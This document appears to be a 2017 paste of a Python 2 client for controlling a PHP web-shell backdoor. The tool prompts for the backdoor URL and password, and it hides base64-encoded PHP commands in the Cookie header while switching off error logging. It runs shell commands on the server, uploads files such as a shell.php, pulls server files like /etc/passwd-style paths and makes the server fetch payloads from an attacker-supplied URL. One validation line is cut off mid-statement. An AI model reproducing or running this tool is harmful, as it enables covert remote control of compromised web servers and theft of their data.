Feb 9th, 2017
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  1. #!/usr/bin/python
  2. import sys
  3. import os
  4. import urllib2
  5. import base64
  6. import time
  7. import re
  8. import platform
  9. from urlparse import urlparse
  11. def get( t, url, p, pwd="", c="", r="", out=None):
  12. userAgent = 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
  13. fcmd = "@error_reporting(0);ini_set('error_log',NULL);ini_set('log_errors',1);ini_set('max_execution_time',0);set_time_limit(0);"
  14. p = 'p='+str(p)
  15. if len(pwd) > 0:
  16. fcmd += "chdir('"+pwd.strip()+"');"
  17. if t == "exec":
  18. fcmd += 'function ex($c) {$o = \'\';if (function_exists(\'system\')) {ob_start();@system($c);$o = ob_get_clean();}elseif (function_exists(\'passthru\')) {ob_start();@passthru($c);$o = ob_get_clean();}elseif (is_resource($f = @popen($c,"r"))) {$o = "";while(!@feof($f))$o .= fread($f,1024);pclose($f);}elseif (function_exists(\'shell_exec\')) {$o = @shell_exec($c);}elseif (function_exists(\'exec\')) {@exec($c,$o);$o = @join("\\r\\n",$o);}else{$o = "[!]: could not execute commands";}return $o;}'+"echo ex('" + c.replace( "'", '\\\'' ) + "');"
  19. elif t == "#upload":
  20. if os.path.isfile(c):
  21. if out == None:
  22. fcmd += upload( c )
  23. else:
  24. fcmd += upload( out )
  26. fp = base64.b64encode( open(c, "r").read() )
  27. p += "&t="+fp.replace("=", "")
  28. else:
  29. return "Error, wrong file"
  30. elif t == "#download":
  31. fcmd += download(c)
  32. elif t == "#downurl":
  33. fcmd += downurl(c)
  34. else:
  35. fcmd += c
  37. fcmd = encode( fcmd )
  38. headers = { \
  39. 'User-agent': userAgent, \
  40. 'Cookie': fcmd, \
  41. 'Referer': r \
  42. }
  43. e = urllib2.Request(url, p, headers=headers)
  44. try:
  45. response = urllib2.urlopen(e).read()
  47. except:
  48. response = "Error"
  49. return response.replace("<apple>","")
  51. def encode( cmd ):
  52. cmd = base64.b64encode(cmd)
  53. max = len(cmd)
  54. c1 = ''
  55. c2 = ''
  56. for i in range(0,max / 2):
  57. c1 += cmd[i]
  58. for i in range(max / 2,max):
  59. c2 += cmd[i]
  60. finalc = 'a='+c1+';b='+c2.replace("=", "")
  61. return finalc
  64. def upload( fileName ):
  65. run = "file_put_contents( '"+ fileName +"', base64_decode($_POST['t']));"\
  66. "if ( file_exists('"+fileName+"') && is_file('"+fileName+"') && md5(base64_decode($_POST['t']) == md5(file_get_contents('"+fileName+"') ) ) )"\
  67. "{echo 'Seccess';}"\
  68. "else{echo 'Failed';}"\
  69. "echo ' to Uploaded !';"
  70. return run
  72. def download( fileName ):
  73. run = "if ( is_readable('"+ fileName +"') ){echo file_get_contents('"+ fileName +"', 'r');}else{echo 'ER00R';}"
  74. return run
  76. def downurl( fileName ):
  77. run = "echo 'Uploaded ';if ( file_put_contents( \""+ fileName +"\", file_get_contens($_SERVER['HTTP_REFERER'])) )"\
  78. "{echo 'Seccess !';}else{echo 'Failed !';}"
  79. return run
  81. def is_valid_url(url):
  82. regex = re.compile(
  83. r'^https?://' # http:// or https://
  84. r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|' # domain...
  85. r'localhost|' # localhost...
  86. r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
  87. r'(?::\d+)?' # optional port
  88. r'(?:/?|[/?]\S+)$', re.IGNORECASE)
  89. return url is not None and
  91. def helpm( t ):
  92. if t == "url":
  93. return "Enter the php file URL path, EX: .php, etc"
  94. else:
  95. return "No extra information needed for this option!"
  97. def checkpass( u, p ):
  98. ofc = "mojo"
  99. tmp = get( "", u, p, "", "echo '"+ofc+"';")
  100. if ofc in tmp:
  101. return True
  102. else:
  103. return False
  105. def finput( m, t=None, f=False, url=""):
  106. tmp = str(m)
  107. tmpinput = raw_input( tmp )
  109. if tmpinput.lower() == "exit":
  110. print("[#]: Exiting...")
  111. sys.exit()
  112. elif ( f == True ):
  113. if tmpinput.lower() == "help":
  114. print( helpm("url") )
  115. tmpinput = finput( tmp, t, True)
  116. if t == "url":
  117. if not is_valid_url(tmpinput):
  118. print("[!]: UNvalid URL !")
  119. tmpinput = finput( tmp, t, True)
  120. else:
  121. return tmpinput
  122. elif t == "pass":
  123. sys.stdout.write("[#]: Connecting... \r")
  124. if tmpinput == "":
  125. tmpinput = "TMCW"
  126. if checkpass( url, tmpinput ) == False:
  127. sys.stdout.write("[!]: Wrong Password ! \r\n")
  128. tmpinput = finput( tmp, t, True, url)
  129. else:
  130. print("[#]: Connected ")
  131. return tmpinput
  133. else:
  134. return tmpinput
  136. def options( user, domain, password, pwd, url ):
  137. option = "exec"
  139. print("Enter \"#help\" to see avalible options.")
  140. while option != "exit":
  141. if "dows" in platform.system():
  142. shell = user+"@"+domain+":"+pwd+"# "
  143. else:
  144. shell = "\033[0;31m"+user+ "\033[1;36m@\033[1;32m"+domain+"\033[1;30m:\033[1;36m"+pwd+"\033[1;31m#\033[m "
  145. tmp = raw_input(shell)
  146. if tmp == "#help":
  147. print("""OPTIONS:
  148. #help\t\tPrint this menu.
  149. #upload\tUpload file from clint to server.
  150. \t\t EX: #upload /path/shell.php /server/bak.php
  151. #download\tDownload a file from the server.
  152. \t\t EX: #download /etc/passwdx
  153. #downurl\tDownload file from URL to server.
  154. \t\t EX: #downurl output.php
  155. #php\t\tExecute PHP eval codes.
  156. \t\t EX: #php echo 'apple';""")
  158. elif "#" in tmp:
  159. tmp = tmp.split(" ")
  160. if tmp[0] == "#upload":
  161. if not tmp[2] and len(tmp[1]) > 0 :
  162. print( "[#]: " + get(tmp[0], url, password, pwd, tmp[1] ) )
  163. elif len(tmp[1]) > 0 and len(tmp[2]) > 0:
  164. print( "[#]: " + get(tmp[0], url, password, pwd, tmp[1], None, tmp[2] ) )
  165. else:
  166. print("[!]: Error, Wrong input")
  167. elif tmp[0] == "#download":
  168. if len(tmp[1]) > 0 and len(tmp) == 2:
  170. down = get(tmp[0], url, password, pwd, tmp[1] )
  171. finfo = tmp[1].replace("\\","/").split("/")
  172. fname = finfo[len(finfo)-1]
  173. print("[+]: Downloading..."+fname)
  175. open(fname, "w").write( down )
  176. if os.path.isfile(fname):
  177. print( "[+]: File saved to :" + fname )
  178. else:
  179. print( "[!]: Error, Couldn't Download File" )
  180. else:
  181. print("[!]: Error, Wrong input")
  182. elif tmp[0] == "#downurl":
  183. if len(tmp[1]) > 0 and len(tmp[2]) > 0:
  184. print( "[+]: " + get(tmp[0], url, password, pwd, tmp[1] ) )
  185. else:
  186. print("[!]: Error, Wrong input. check \"#help\"")
  187. elif tmp[0] == "#php":
  188. tmp[0] = ""
  189. print( get("", url, password, pwd, " ".join(tmp) ) )
  190. elif "cd" in tmp:
  191. tmp = tmp.split(" ")
  192. if tmp[0].lower() == "cd" and len(tmp) > 1:
  193. if "\\" in tmp[1] or "/" in tmp[1]:
  194. pwd = get("", url, password, tmp[1], "echo getcwd();")
  195. else:
  196. if "\\" in pwd:
  197. pwd = get("", url, password, pwd+"\\"+tmp[1], "echo getcwd();")
  198. else:
  199. pwd = get("", url, password, pwd+"/"+tmp[1], "echo getcwd();")
  200. else:
  201. print("[!]: Change with single command only.")
  202. elif tmp == "exit":
  203. print("[#]: Exiting...")
  204. sys.exit()
  205. else:
  206. print( get("exec", url, password, pwd, tmp ).strip() )
  208. def main():
  210. burl = finput("[+]: Enter php BackDoor URL: ", "url", True)
  211. password = finput("[+]: Password (defualt TMCW): ", "pass", True, burl)
  213. pw = get("", burl, password, "", "echo getcwd();")
  214. domain = urlparse(burl)[1]
  215. user = get("", burl, password, "", "$r = posix_getpwuid(posix_getuid());echo $r['name'];")
  217. #print( get( '#upload', burl , password, pw, "x.txt", None, "xxx.TXT" ) )
  219. options(user, domain, password, pw, burl )
  221. if __name__ == "__main__":
  222. print(" @TMCW- SecretFiles ")
  223. print(" Please upload the php backdoor file to your web server and follow the instractions. For help enter help, exit to exit!")
  224. try:
  225. main()
  226. except:
  227. print("[!]: Exiting...")
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